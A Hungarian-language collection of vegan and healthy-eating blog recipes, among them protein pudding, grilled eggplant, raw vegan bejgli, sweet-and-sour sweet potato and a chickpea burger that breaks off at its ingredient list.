A müzlibe való szénhidrátokat (zabpehely, amaránt, lenmag stb.) ilyenkor szoktam magamhoz venni. Egyes szakértők szerint délben kell a legtöbb szénhidrátot bevinni, ezt mondják a 160 grammosok is. Igazság szerint én sohasem szoktam grammokat meg kalóriákat számolni, csak törekszem a sok zöldség meg gyümölcs fogyasztására, és gluténmentes vegán étrendet követek. Itt már nem sokat tévedhet az ember, legfeljebb annyit, hogy ha fogyasztani kell a testsúlyomból esetleg valamelyik versenyre, akkor kiiktatom az édesítő cuccokat (amúgy sem eszem cukrot), a sót és kevesebb széhidrátot eszem. Ezzel simán le tudok fogyni 1-2-3 kilót, ha kell. Viszont a testsúlyom növeléséhez folyamatosan ennem kell, tehát a reggeli turmix és a déli müzli-gyümölcs-magok kombó mellé nem elég az esti zöldség-fehérje étkezés, hanem kellene még 1-2 napközben.
A kettlebell sport erőállóképességi sport, tehát alacsony szénhidrátbevitellel nem igazán működik. Nem csak az edzésteljesítmény, hanem a regeneráció rovására is megy az alacsony szénhidrát-bevitel. Inkább az élvezeti kajákat kell kiiktatni, és rendesen edzeni, akkor nem lesz gond a testsúllyal.
Gauranga Das http://hotashtanga.com
Fehérjés csokipuding
2017. február 18. Beautilicious
Edzés utáni nasira vágysz? Ezt az egészséges, magas fehérjetartalmú csoki pudingot nyugodt szívvel fogyaszthatod. Nem is kell sok idő az elkészítéshez, csupán pár pillanat amíg összekevered az összetevőket. Ezt a mennyei édességet tízóraira, vagy akár uzsonnára is jó választás. Hozzávalók: 25g fehérje por (csokoládé ízesítésű vagy akár natúr is lehet) 20g holland kakaópor 10g eritrit (ha natúr fehérjét használunk) 1db banán 150ml növényi tej Elkészítés: A hozzávalókat tegyük turmixgépbe és turmixoljuk amíg krémes állagot nem kapunk. Jó étvágyat!
Grillezett padlizsánkarikák
2017. február 16. Vegán receptek Tőlünk Nektek
Anna legújabb menüje:
Hozzávalók:
A pác:
- 2-3 ek mustár
- 3-4 gerezd fokhagyma
4-5 ek olaj ( lehet oliva de más is)
- víz és só
Az összetevőket összeturmixoljuk, a padlizsánkarikákat egy éjszakára (vagy reggel betéve, esti sütéshez) pácba áztatjuk. A padlizsánkarikákat grilltálcára fektetve sütőben puhára sütjük.
Köretek:
A kölest előre megfőzzük, nem kell, hogy szétfőjön, de puha legyen.
Egy-két vöröshagymát apró kockákra vágunk, sóval kókuszolajon dínszteljük, majd hozzáadjuk a füstölt tofukockákat és együtt pirítjuk, amíg kellemes puha néhol barnásra pirult lesz.
Ezen a ponton kivehetünk annyit, amennyit a köleshez szeretnénk keverni.
A többihez az édesburgonyát felkockázva szintén hozzákeverjük, kicsit együtt pirítjuk, majd kevéske (1,5 dl) vízzel puhára főzzük.
Jó Étvágyat!
Répapüré
2017. február 15. Beautilicious
Ha itthon meglátoma sárgarépát....volt répa, nincs répa :). A sárgarépa is a kedvenc zöldségeim közé tartozik. Egyszerűen imádom a zöldségeket. Olyan sok módon felhasználhatóak, édesen és sósan egyaránt (nem beszélve arról, hogy milyen egészségesek). Nem tudok betelni vele. Most a legkrémesebb sárgarépa receptemet mutatom meg neked, ami feldobja a szürke hétköznapokat. Hozzávalók - 2db sárgarépa - 3ek tejföl - őrölt kömény - só, bors Így készítsd - Főzd puhára a megtisztított répákat - Tedd turmixgépbe vagy aprítóba és pépesítsd - Keverd hozzá a tejfölt és ízlés szerint fűszerezd
Királynők reggelije
2017. február 14. Beautilicious
Ugye te sem hagyod ki a reggelit a mindennapjaidból. Bármi is a célod, akár a fogyás akár csak az egészséges életmód, a reggeli a nap legfontosabb étkezése. Ahhoz, hogy energikusan induljon a napod, ahhoz a szervezetednek szüksége van energiára. Persze a rohanós hétköznapokon nincs sok időnk a reggelire, de 5-10 percet mindenkinek szánnia kell az egészségére. Ha nem tudod mit reggelizz, én segítek. Válasz reggelire zabkását, és a szervezeted meghálálja. Hogy miért pont a zabkása? A zab egy olyan teljesértékű gabona, mely szervezetedet lassú felszívódású szénhidrátokkal látja el, és sokáig teltség érzetet okoz. Alacsony a glikémiás indexe, így a cukorbetegeknek is ajánlott fogyasztása. Gazdag rostokban, B és E vitaminban. Magas a fehérjetartalma, a sportolók is előszeretettel fogyasztják. Fogyasztása ajánlott a magas koleszterinszint illetve magas vérnyomás ellen. Rendszeres fogyasztása rák megelőző, valamint segít csökkenteni a szív és érrendszeri megbetegedések kialakulásának kockázatát. Számtalan egészségügyi hatása mellett antidepresszáns, azaz hangulatjavító hatása van, és nagyon finom is. Nekem az egyik kedvenc reggelim, és olyan sokféleképp elkészíthető, hogy sose lehet megunni. Én így készítem: 50g zabhelyhet összekeverek 1ek édesítőszerrel és vaníliakivonattalFelöntöm 200ml kókusztejjel, de vízzel vagy sima tejjel is ugyanolyan finom5-10percig főzöm lassú tűzönÍzesítem gyümölcsökkel, magokkal kedvem szerint
Teljes kiőrlésű túrós pogácsa
Hozzávalók: 40 dkg teljes kiőrlésű liszt 20 dkg fehér liszt 2 dkg friss élesztő 50 dkg túró 20 dkg puha vaj 1,5 dl tejföl 2 tk só 5 dkg füstölt sajt reszelve szezámmag a tetejére A kétféle lisztet egy tálban összekeverjük. A közepén kialakított mélyedésbe langyos vizet öntünk, belemorzsoljuk az...
Diós csigák (vegán)
A legtöbb ember a péksüteményt ma már csak egy utcai bódéban tudja elképzelni. Persze, hiszen minden második sarkon van már pékség. Egyik ilyen, másik olyan, mi meg válogatunk, fanyalgunk vagy akár ácsingózunk rajtuk. Aztán rohanvást gyűrjük le a csigákat meg pogikat az utcán, belebújunk a papírzacskóba, és közben azon morfondírozunk, hogy vajon mekkora az a falat, aminél még úgy tűnik, mintha semmi nem lenne a szánkban. :))))
És fogalmunk sincs már, hogyan kell péksütit sütni, sőt, biztosak is vagyunk benne, hogy ez valami hipernehéz, ultrabonyolult dolog. Pedig nem is! :)
Próbáld ki a házi péksütiket, simogasd a tésztát, válogasd össze te az alapanyagaidat, és láss csodát: ez a péksüti bizony nem csak frissen sütve lesz jó, hanem akár másnap is, és újra felfedezed a régen elfeledett ízeket. Csinálj sokat, fagyaszd le, és minden egyes reggel, amikor előveszel egyet, áldani fogod a saját nevedet. ;)
Mostantól nincs kifogás, ha a család (én! hehe..) édeset kíván: ezekből a hozzávalókból nálam tényleg mindig van otthon, és itt az én szuper diós csigám, amihez az ihletet Zöldella receptje szolgáltatta. Ezúton is köszönöm neki! :)
Hozzávalók két nagy tepsi csigához:
[...] Bővebben!
Édes-savanyú ananászos batáta rizzsel (gluténmentes, laktózmentes, tojásmentes, vegán)
édes-savanyú ananászos batáta rizzsel (mindenmentes, vegán) Az úgy kezdődött, hogy AKCIÓS volt az ananász és az édesburgonya is a boltban... aztán úgy folytatódott, hogy mostanában a régi, kedvenc húsos ételeimet reformálom meg és varázsolom őket húsmentessé, a leginkább természethez (és nem pedig az élelmiszeriparhoz) közeli állapotba. Így hát végül úgy végződött, hogy a múltkori mexikói-magyar barátság után, most Délkelet-Ázsia konyháiba kalauzollak el titeket egy kis thaiföldi napsütésért. ;-) Az édes ízek kedvelőit most nagyon boldoggá fogom tenni! :-) Csak annyit fűznék hozzá: sokkal finomabb lett, mint azt elképzeltem! :-o édes-savanyú ananászos batáta rizzsel (mindenmentes, vegán) HOZZÁVALÓK (Kb. 4 személyre) kb. 800 g batáta (vagy édesburgonya) kb. 800 g friss ananász 4 ek kókuszzsír vagy olívaolaj (Himalája) só, csipet őrölt fehér bors 2 ek világos szójaszósz, 2 ek balzsamecet (étkezési ecet is jó) 3 gerezd fokhagyma 1 közepes fej vöröshagyma 1/2 db zöld színű és 1/2 db piros színű kaliforniai paprika 1 tk frissen reszelt gyömbér 4 ek ketchup (paradicsompüré is jó) 3 ek édesítőszer tetszés szerint (én kókuszcukrot használtam) 1/2 db frissen facsart citrom leve 2 bögre barna rizs (3 ek fehér szezámmag - elhagyható) édes-savanyú ananászos batáta rizzsel (mindenmentes, vegán) ELKÉSZÍTÉS 1) A rizst feltesszük a szokásos módon főzni. (Dupla adag vízben, kb. 25 percig.) 2) Előkészítés: A vöröshagymát és a paprikákat hosszúkás csíkokra vágjuk. A batátát (édesburgonyát) és a friss ananászt meghámozzuk és kb. kockacukor méretű formákra vágjuk. 3) Felteszünk egy WOK-ot a tűzhelyre. Beletesszük a kókuszzsírt, a vöröshagymát, a felkockázott batátákat, a csíkokra vágott paprikát egy 1/2 bögre tiszta vízzel főzni. Reszeljük hozzá a fokhagymákat és a gyömbért. Fedjük le fedővel és kb. 15 perc alatt főzzük félpuhára a batátát. 4) Ezután hozzáadjuk az ananászt és fedő nélkül még kb. 10 percig főzzük. 5) Közben keverjük ki az édes-savanyú szószt: ketchup + szójaszósz + balzsamecet + édesítőszer + 4 ek tiszta víz. Forraljuk fel az egészet, majd vegyük le a tűzről és adjuk hozzá a frissen facsart citromlét, majd az egészet keverjük az ananászos batátához. (Tetszés szerint megszórhatjuk szezámmaggal is.) 6) Egy utolsó összeforralás (kb. 2 perc) és már kész is. 7) Barna rizzsel, rizstésztával vagy üvegtésztával azonnal tálalható. (Én szervíroztam mellé friss és ropogós jégsalátát is.) édes-savanyú ananászos batáta rizzsel (mindenmentes, vegán) Táplálkozz, ne csak étkezz! édes-savanyú ananászos batáta rizzsel (mindenmentes, vegán)Jó étvágyat kívánunk! :-) Tetszett a recept? Lapozz bele a Mit eszik a Világ? című könyvembe, melyben 284 színes oldalon ... ...és 170 db egészséges recepten keresztül ehetjük körbe a Világot! Megnézhetjük együtt milyen alapanyagokat fogyasztanak már több ezer éve a távoli országokban,... ...hogyan őrzik meg egészségüket és maradnak fiatalok az emberek, ...miként készíthetjük el a természet kincseit az európai otthonunkban is könnyedén és ízletesen! Számtalan recept, sok-sok hasznos konyhai tipp és rengeteg természetes alapanyag, diétánkhoz igazítva! "Draga Hanis Szonja! Mai nap megérkezett a nagyszerű könyved a Mit eszik a Világ? Nagyon profi munka, telis-tele jobbnál jobb nemzetközi receptekkel. Minden egyes oldalról árad a szeretet, a profizmus. Imádom a fotókat benne, nemcsak a finomabbnál finomabb ételekről, hanem rólatok és a csodálatos tájairól is! Nagyon gyakran fogunk belőle főzni az már biztos! Első receptem a Fahéjas-Karamellás Granola lesz. :-) Mégegyszer gratulálunk! Dave Raspberry is külön gratulál. A képek alapján úgy jó 100 receptre rá is bökött, hogy mit látna szívesen. A születésnapi menüjét is ebből fogom főzni. Dobai Szabina, vásárló" Kattints ide és nézz bele a könyvbe!
Tejszínes fodros kel tészta sütőben sütve
Minap szomszédunk beállított egy jó szatyormyi fodros kelkáposztával és egy póréhagymával. A közelünkben lévő farmról hozta, ahol eladásra is termelnek. Igazán rendes volt tőle, hogy gondolt ránk. Valami rendhagyóbb módon szerettem volna elkészíteni. Mivel a spenóthoz hasonlít, így tésztát főztem és sütőben összesütöttem őket. Jól sikerült. A-, C-, E-, K- és B6-vitamin, mangán, vas, kalcium, réz és kálium forrása a fodros kel . G yulladáscsökkentő, hatékonyan segít az asztma és az ízületi gyulladások elleni védekezésben. Rosttartalma révén tisztítja a vastagbelet, védi emésztőrendszerünket. Áztatással tisztítsuk.
A fodros kelkáposztát az első őszi fagyok után takarítják be, mert a fagy hatására további szőlőcukor termelődik a növényben, s ettől még édeskésebbé válik. Észak-Németországban telente vidám ,,káposztautakat is szerveznek - leginkább januári szombatokon. Az út többnyire falusi kiskocsmába vezet, ahová a mulatótársak taligán tolják a hideg elleni védőitalt (főként Kornt, azaz gabonapálinkát), amit sörrel kísérnek. Brandenburg egyes vidékein a savanyúkáposztába is vágnak néha fodrost kelt (Knieperkohl).
A recept
Hozzávalók:
- 1/2-1 fodros kelkáposzta zöld levelei
- növényi tej
- ételízesítő
- 1 fej hagyma
- 1/2 póréhagyma
- 3-4 gerezd fokhagyma
- 1-2 kanál étkezési keményítő
- 1 kanál sörélesztő-pehely
- tészta
- só
- víz
- citrom (opcionális)
Elkészítés:
A fodros kelkáposzta leveleit átmossuk, kemény szárát levágjuk, leveleit felaprítjuk, a póréhagymát és fokhagymát felkarikázzuk. Hagymát aprítunk, majd kevés vizen megpároljuk a hagymát, rátesszük a zöld leveleket, kicsit ételízesítővel megszórjuk, felöntjük egy kevés növényi tejjel (1-2dl), megszórjuk a felaprított fokhagymával, s a káposztát így enyhén megpároljuk. Tésztát főzünk hozzá. A megfőtt tésztával összekeverjük, beletesszük egy tűzálló tálba. Kb. 2,5 bögrényi hideg tejet kikeverünk 1 kanál sörélesztő pehellyel, 1 kanál étkezési keményítővel és kevés ételízesítővel. Felforraljuk, közben kevergetjük, hogy csomómentesre sűrűsödjön. A tűzálló tálba tett tésztát megöntözzük az enyhén sűrűre főtt szósszal. (Pudingnál lényegesen lazább, nem olyan sűrű lesz a növényi tej-sörélesztő pehely-étkezési keményítővel készült szósz.) A tetejét megszórjuk póréhagyma karikákkal. Kb 15-20 perc alatt sütőben átsütjük.
Tálalásnál csepegtethetünk a tetejére citromot, vagy citromkarikát tehetünk rá, így még különlegesebb íze lesz.
Hajdinás kelkáposztaleves
2017. január 20. Éltető ételek
A kelkáposztalevesnek leginkább a frankfurti változata ismert, én most viszont egy vegán változatot ajánlok nektek. Különlegessé tettem ezt még főtt hajdinával, amelynek a jótékony hatásairól már korábban írtam. Hozzávalók (2-3 adag): - 1 evőkanál kókuszolaj - 1 vöröshagyma - 2 gerezd fokhagyma - 1 duci sárgarépa - 1 petrezselyemgyökér - 1 nagyobb krumpli - 1 szelet zeller - 1 szárzeller - 1 jó nagy marék felszeletelt kelkáposzta - 1/2 csésze zöld hajdina (nem pörkölt) - 2 babérlevél - 1/2 mokkáskanál majoranna (ezt ne hagyd ki belőle) - késhegynyi őrölt kömény - 1 teáskanál pirospaprika - himalája só, bors Elkészítése: - A zöldségeket tisztítsuk meg és karikázzuk, kockázzuk. - A kókuszolajon dinszteljük meg a hagymát, majd reszeljük bele a fokhagymát is. - Dobjuk rá a zöldségeket (a kelkáposzta kivételével), pirítsuk együtt kb. 5 percig. Fűszerezzük. Öntsünk rá vizet és főzzük roppanósra. - Közben a hajdinát bő vízben főzzük kb. 10 percig. Öblítsük le. - Tegyük bele a levesbe felcsíkozott kelkáposztát és a hajdinát. Mintegy 10 perc alatt főzzük össze.
Kávés diós sütemény (vegán)
2017. január 14. Zizi kalandjai
Egy külföldi munka kapcsán kellett készítenem egy kávés süteményt. Tanakodtam, hogy mivel is álljak elő, amikor eszembe jutott, hogy banánkenyér formába öntöm, teszek is bele banánt, hogy édesítse természetesen a süteményt, meg “össze is ragassza”, de nem banánkenyérnek fogom hívni, mert ez nem az. Angolul coffee cake-nek hívják… ez igazából azt jelenti, hogy van a tésztájában kávé, de azt is jelenti, hogy kávézáshoz ajánlott finomság.
Szóval banánkenyér alapot vettem, ahhoz adtam kávét, jó sok darált diót, vaníliát, juharszirupot… a tetejére pedig kókuszcukros aprított diót szórtam, hogy jó ropogós legyen. Elég sokáig sült a benne lévő nedves dolgok miatt (banán, kávé, rizstej), de egy óra után kivettem a sütőből, mert a tetején lévő dió különben megégett volna. A tészta nem maradt nyers, de ez egy igazán “nedves” , ragacsos, puha süti. Kávéhoz, teához, forró csokihoz ideális délutáni uzsonna, de délelőtti tízórainak is megteszi.
A benne lévő kávé miatt gyerekeknek nem ajánlom, de ha őket is meg akarjuk kínálni, akkor készíthetjük gabonakávéval is. No persze akkor nem lesz meg az a nagyon finom enyhén kávés íze (olyan “kapucíneres”), amitől isteni ez a sütemény. A család tesztelte, odáig voltak érte… főleg apukám, aki alig hagyott kóstolót a család többi tagjának!
Kávés diós sütemény (vegán)
Hozzávalók:
– 2 db érett banán, villával pépesre törve
– 130 g darált dió
– 135 g tönköly fehérliszt
– 125 ml kávé vagy gabonakávé
– 60 ml rizstej (vagy más növényi tej szobahőmérsékletű)
– 6 evőkanál juharszirup
– 3 evőkanál kókuszolaj (szobahőmérsékletű)
– 2 evőkanál őrölt lenmag
– 6 evőkanál víz
– 3 és 1/2 teáskanál foszfátmentes sütőpor
– 1/2 teáskanál őrölt vanília
– 1/2 teáskanál Himalaya só
– 80 g dió, aprítva + 3 evőkanál kókuszvirág cukor (tetejére)
Egy tálkában keverjük össze a lenmagot a vízzel és hagyjuk állni 6-8 percig, amíg zselés állagú lesz. Sütőpapírral béleljünk ki egy 23 cm-es püspökkenyér formát. Melegítsük elő a sütőt 180C fokra.
Egy tálban keverjük össze a száraz hozzávalókat: darált dió, liszt, vanília, só és sütőpor. Egy másik tálban keverjük össze a villával pépesre tört banánokat a kávéval, a rizstejjel, a kókuszolajjal, a juharsziruppal és a zselés állagú lenmag “tojással”. Öntsük a nedves hozzávalókat a szárazhoz és jól keverjük át a tésztát.
Öntsük az egészet a formába. Szórjuk meg a tetejét a kókuszcukros dióval és süssük az előmelegített sütőben 60-70 percig. Kivétel előtt azért végezzünk tűpróbát. Elképzelhető, hogy a tészta nedves még egy kicsit, de ennek ilyen az állaga már készen is.
Avokádós mangó saláta
Az év első receptje tőlem ez az eklektikus, sokszínű, egzotikus saláta. Általában nem szeretem a gyümölcsöket keverni a zöldség salátákba a helyes ételtársítások miatt, de az Ünnepek alatt kivételt tettem a mangóval és avokádóval, roppanós káposztával, csírákkal, szezámaggal, kevés földimogyoróval és chilis öntettel tálaltam. Hozzávalók 2 főre: 1/2 db édes, friss káposzta a torzsája nélkül 1 db friss mangó 1 db avokádó maréknyi vegyes csíra 2 evőkanál enyhén pirított szezámmag maréknyi sózott földimogyoró Öntet: 2 evőkanálnyi hidegen sajtolt szezámmag olaj 1/2 kk parajdi só 1 lime kipréselt leve vágott friss chili vagy késhegynyi szárított chili pehely 1 kk virágméz A káposztát vékony csíkokra vágjuk, összekeverjük a csírákkal. A mangót kettévágjuk, majd héjastól felszeleteljük, az avokádót lehéjazzuk és kockákra vágjuk. Tányérokra halmozzuk a keveréket, rátesszük az avokádót, majd megszórjuk a szezámaggal, földimogyoróval, a tetejére helyezzük a mangó szeleteket. Az öntet hozzávalóit egy kis üvegben (pl: kifogyott bébiétel üvege) összerázzuk. Fogyasztás előtt öntjük rá csak az öntetet.
Egyszerű, tojásmentes mennyei csokoládétorta
2017. január 1. Élj harmóniában
A tortakészítés egy izgalmas feladat. Ilyenkor is az egyszerűbb recepteket szeretem, amit csak kikeverek és beleöntök egy tortaformába és már készen is van. :) Nem szoktam krémes tortákat készíteni - mert általában túl vannak számomra bonyolítva a receptek és sok receptben tojás is van. A férjem Édesanyjának volt a születésnapja (dec.31.) és lévén előző héten túrótortát csináltam, mindenképpen valami nagyon más ízvilágot szerettem volna. Ő nem szereti a túl édes dolgokat és így esett a választásom a csokoládétortára. Nagyon sokféle receptet megnéztem, beszéltem néhány barátommal, ők hogyan csinálják, majd végül egy kedves ismerősöm javaslatára párizsi krémet ( ganache vagy trülffel néven is ismert ) készítettem. Ami szerintem a létező legfinomabb, legcsokoládésabb és egyben legegyszerűbb csokoládé krém - szuper minőségű tejszín és csokoládé keveréke. Ez nem a gazdaságos csokoládékrém változat. Ennél a receptnél nem lehet kispórolni az alapanyagot, ha valóban isteni finom csokoládétortát szeretnél:) Mindig hangsúlyozom, milyen fontos, hogy jó minőségű ételeket fogyassz - erre ne sajnáld az energiát, időt és a pénzt. Mert nem csak az ételek íze, de az egészségi állapotod is romlik, gyengül az immunrendszered és az emésztésedre is kedvezőtlenül hatnak a nem megfelelő minőségű ételek. Lehetőleg vegyszermentes (bio) alapanyagokat használj. Legyen az elved: inkább a minőség, mint a mennyiség. Egy jó étel elsődleges titka , hogy jó minőségű alapanyagokból kell elkészíteni. Hozzávalók a piskótához 30 dkg teljes kiőrlésű tönkölybúzaliszt 20 dkg fehér tönkölybúzaliszt 20 dkg teljes értékű barna nádcukor 1 csg. sütőpor 5 ek kakaó (cukrozatlan, jó minőségű) 3 ek. citromlé (friss citromból) vanília 12 ek. repceolaj 5 dl víz A piskótát általában egyben szokták megsütni és utána szelik. Én biztosra szerettem volna menni, hogy véletlenül se törjön el vágásnál a piskóta, ezért inkább két részletben sütöttem meg ezt a mennyiséget - így a tortám az alján és a tetején is sima felületű lett. Ebben az esetben kétszer kell kikeverni a fele mennyiséget - amikor a nedves és száraz alapanyagokat összekevered, utána viszonylag gyorsan kell betenni a sütőbe. Í gy biztosan szépen feljön a tésztád . Először a por hozzávalókat tedd egy tálba, majd keverd össze. Ezután tedd hozzá a vizet, citromlevet és az olajat. Az egészet keverd jól össze és kivajazott, lisztezett tortaformába öntsd bele. 180 fokra előmelegített sütőben süsd készre. ( Ez kb. 40 perc, ha egészbe sütöd a piskótát és ha két részletbe sütőd, akkor kb.2* 25 perc) a krémhez 300 ml tejszín 30 dkg nagyon jó minőségű keserű csokoládé 3 dkg vaj vanília Forrald fel a tejszínt, majd vedd le a tűzhelyről és öntsd bele a feldarabolt csokoládét, csipet vaníliát és a vajat Picit megkeverve hagyd, hogy felolvadjon a csokoládé. (Ha édesebb csokoládékrémet szeretnél, akkor tehetsz hozzá egy kis nádcukrot is). Hagyd a keveréket kihűlni, majd tedd hűtőszekrénybe minimum 3 órára. Amikor jól kihü lt a krém, habverővel habosítsd ki. A krém picit kevesebb, mint a felét kend a két piskótalap közé, majd a többit kend el jól a tetején és az oldalán. Ezt követően kidíszítheted a tortát. A díszítésnek csak a fantáziád szabhat határt. :) Én felforraltam egy kis tejszínt, beleolvasztottam egy kis csokoládét. Majd behűtöttem és hidegen felvertem kemény habbá. A csokoládés tejszínhabot habzsákba töltöttem és ezzel díszítettem és némi mandulaforgáccsal.
Csokitallérok
2016. december 28. Gitta nyersétel blogja
A legegyszerűbb és legszebb édesség mostanában :) Annál színesebb, minél többféle magod, aszalt gyümölcsöd van otthon. Annál egészségesebb, minél tisztább csokit használsz alapanyagnak. Vehetsz készen jó minőségű keserű csokit is, de a legjobb, ha magad készíted kakaóvajból, kakaóporból... minden adalék mentesen :) Csokis tallérok Az alapja lehet egyszerűen egy jó minőségű keserű csokoládé, amit gőz fölött megolvasztunk, ami a tetejére kerül, az pedig minden földi jó, amit a kamránk rejt. Most én ehhez csak aszalt sárgabarackot vásároltam, hogy sárga szín is legyen benne, egyébként minden más összetevő volt itthon. Nézzük mik lehetnek: dió, mandula, kesudió, tökmag, barna és sárga lenmag, szezámmag, aszalt hajdina csíra... A gyümölcsöket is színesen válogassuk össze: aszalt meggy, datolya, aszalt áfonya, mazsola, goji bogyó, aszalt sárgabarack, aszalt szilva.... A csoki: 10 dkg nyers bio kakaóvaj 5 dkg nyers bio kakaópor 1-2 evőkanál édesítőszer (vegánoknak agavé vagy más növényi szirup, egyébként méz) A kakaóvajat gőz fölött kevergetés mellett megolvasztjuk, belekeverjük a kakaóport és az édesítőszert. Tapadásmentes lapra evőkanállal kis kupacokat formázunk, és mielőtt megkötne a csoki, rászórjuk a különböző magokat, aszalt gyümölcsöket. Javaslom ezeket már előre odakészíteni, ne akkor kelljen felkutatni, darabolni... A csoki természetesen lehet készen vásárolt is, akkor aztán még egyszerűbb a dolog: egyszerűen csak ki kell bontani a csomagolásból ( :) ) darabokra törni, és megolvasztani a gőz fölött. A többi már ugyanaz :) 1 kupac kb 1 dkg, vagyis egy 10 dkg-os csokiból kb 10 kupacot tudsz készíteni, ami így elsőre épp elég. :)
Gluténmentes kókuszos-csokis muffin
2016. december 27. Élj harmóniában
Nem szeretem a nagyon édes dolgokat. Igazából ez a muffin sem tartalmaz hozzáadott cukrot, mert csak datolyacukrot használtam hozzá, ami valójában aszalt datolya őrölve . N ekem nagyon nagy kedvenc lett ez a muffin, mert a hajdina liszt és quinoa liszt jellegzetes íze a kakaóval számomra nagyon ízletes eredmény:) Kávé és keserű csokoládé kedvelőknél ez a muffin előnyben:) Hozzávalók 1 csésze quinoa liszt 1 csésze hajdina liszt 1 csésze datolyacukor (teljes értékű nádcukrot is használhatsz helyette) 3 ek. lenmagliszt 3 tk. sütőpor 1 tk. szódabikarbóna 1/4 tk, vanília 1/3 csésze kókuszolaj 4 ek kakaó (cukrozatlan jó minőségű) 1/2 csésze kókuszreszelék 1,5 csésze víz Vegyszermentes (bio) alapanyagokat használj! Egy tálban keverd össze a liszteket, sütőport, szódabikarbónát, fűszereket, kakaót. Majd keverd hozzá a kókuszreszeléket és a kókuszzsírt. Majd végül a vizet adagold apránként és figyeld a tésztád állagát. Az egészet keverd gyorsan össze. Majd egy muffin formába (ha szükséges tegyél bele muffin papírt - 12 muffin lesz ebből a mennyiségből) adagold bele a tésztát. Tedd 180°C fokra előmelegített sütőbe és süsd készre . (kb. 20-25p)
Tápanyagban gazdag bejglik sütés nélkül, a diétás vendégeknek is (nyers vegán, gluténmentes, laktózmentes, tojásmentes)
2016. december 22. Zöld Avocado
Ha szeretnéd egy kicsit feldobni az idei karácsonyi bejgliket és biztosra menni, hogy minden glutén- és/vagy laktózérzékeny, illetve vegán vendéged is bátran ehessen az édességből, akkor itt van 3 nagyszerű recept, amivel tutira mehetsz! Az előző receptben sütésmentes, tápanyagban gazdag datolyagolyókat hoztam nektek 7 féle ízben. Most ehhez hasonló nyers vegán bejgliket és a keksztekercshez hasonló ízvilágú "kókusztekercset" szeretnék megmutatni. Egyszerűen elkészíthetőek, sütést sem igényelnek és szinte minden diétába beleférnek ezek a finom desszertek. Akár már hetekkel korábban elkészíthetjük és a fagyasztóban tárolva várhatják a napot, amikor a vendégek elé kerülnek az ünnepi asztalra. Nekem kifejezetten jól esnek az ilyen könnyen emészthető, gyomrot nem terhelő édességek, a tartalmas karácsonyi menü után. Fogadjátok sok szeretettel őket! nyers vegán bejglik és "kókusztekercs" (glutén- és laktózmentes, vegán) HOZZÁVALÓK mákos bejglihez: - 100 g darált mandula - 150 g magnélküli datolya - 100 g darált mák - 1 db bio citrom reszelt héja (kezeletlen héjú lehetőleg) diós bejglihez: - 100 g darált kesudió - 100 g aszalt szilva - 1 tk őrölt fahéj - 100 g dió (lehet 50 g pekán és 50 g sima dió is) - 1 db narancs reszelt héja kókuszos tekercshez: - 100 g darált mandula - 150 g magozatlan datolya - 100 g kókusz reszelék - 200 ml kókuszkrém - 1 ek útifűmaghéj - 2 ek karob por nyers vegán bejglik és "kókusztekercs" (glutén- és laktózmentes, vegán) ELKÉSZÍTÉS Előáztatjuk a datolyát és az aszalt szilvát is min. 3-4 órára, a diót/pekán diót min. 24 órára, míg a kesu diót min. 10-12 órára. (A mandulát úgyszintén, kivéve, ha bolti darált mandulát használunk.) A MÁKOS BEJGLI készítésénél 1) az áztató víz nélküli datolyát megfelezzük. Az egyik felét (50 g) a darált mandulával a nagy teljesítményű turmixgépbe tesszük, és egyneművé dolgoztatjuk vele. A cél, hogy egy kézzel is jól gyurmázható, egynemű tésztát kapjunk. Ezt két folpack között (nyers sütiknél hasznos, mert így nem ragad a sodrófára a tészta, és sokkal könnyebb felszedni a nyújtódeszkáról is.) kinyújtjuk téglalap alakúra. 2) A mákos töltelékhez a darált mákot, a reszelt citromhéjjal, és a maradék datolyával szintén a gépbe tesszük, és egyneművé dolgoztatjuk vele. Ha nagyon szemcsés maradna 1-2 ek tiszta vizet tehetünk hozzá. 3) Ezzel a mákos krémmel megkenjük a már kinyújtott mandulás tésztalapot, majd egy kanál hátuljával kicsit elegyengetjük a mákot, hogy ne hulljon morzsákra, és hozzáragadjon az alaptésztához. 4) Az alsó folpack segítségével (ezen van a töltött tésztánk) elkezdjük óvatosan feltekerni a bejglit, mint, ahogyan azt az eredeti bejglivel is tennénk. 5) Miután feltekertük, a folpack-kal becsomagolva mehet a hűtőbe min. egy éjszakára. Sokkal könnyebb szeletelni, ha előtte állt a hűtőben egy pár órát. A DIÓS BEJGLINÉL a mákoshoz hasonlóan 1) a kesut és az aszalt szilva felét, a reszelt narancs héjával összedolgozzuk, majd kinyújtjuk két folpack között. 2) A diós töltelékhez a diót és az aszalt szilva másik felét, a fahéjjal összedolgoztatjuk a gépünkkel, majd a krémet, amit kaptunk, rákenjük a kinyújtott kesu lapra. 3) Óvatosan feltekerjük, be a hűtőbe, és kész is. A KÓKUSZOS TEKERCSHEZ 1) ugyanazt a mandulás alapot elkészítjük, mint a mákosnál, azzal a különbséggel, hogy teszünk bele karob port is, amitől ,,csokis lesz a tészta. 2) A kókuszos töltelékhez a kókuszreszeléket megdaráljuk kávédarálón, hogy minél kisebb szemű legyen, szinte porszerű. 3) Hozzáadjuk a kókuszkrémet és az útifűmaghéjat. Összekeverjük, majd rákenjük a kinyújtott ,,csokis tésztára. 4) Óvatosan feltekerjük, és mehet is be a hűtőbe éjszakára. nyers vegán bejglik és "kókusztekercs" (glutén- és laktózmentes, vegán) Kellemes Karácsonyi Készülődést kívánok mindenkinek és Karácsonykor se feledjétek: Táplálkozz, ne csak étkezz! ;-)
Hótegyszerű csicseriborsó- és kukoricaburger
2016. december 12. Vegán muflon
Újabb olvasói levelet kell közzétennem: "Tisztelt Muflon úr! Amennyiben nem hagy fel az urizáló receptek posztolásával, rajzszeget verek a klumpámmal az alsóajkába! Hát honnan szerezzek én itt Rimákseregélyesen édeskrumplit meg babsajtot? Talán érleljek a hálóingemben? Megvolt bennem a szándék, hogy elhagyom a hurkát meg a pejslit, de ha így folytatja, komplett bölénycsordákat fogok tokaszalonnába tekerni! Sőt, a saját vejemet is, a Rezsőt! Aztán majd nézegethet, maga kotványos paszulytatár! Üdvözlettel: Kentaur Lajosné"
A blog elindítása óta megtanultam komolyan venni a hasonló fenyegetéseket, ezért most egy olyan szimpla specialitással hozakodom elő, melynek minden összetevője könnyedén beszerezhető. (Kivéve a csicseriborsót és a koriandert, hogy azért mégis provokáljak egyeseket.)
Összeharácsolandó:
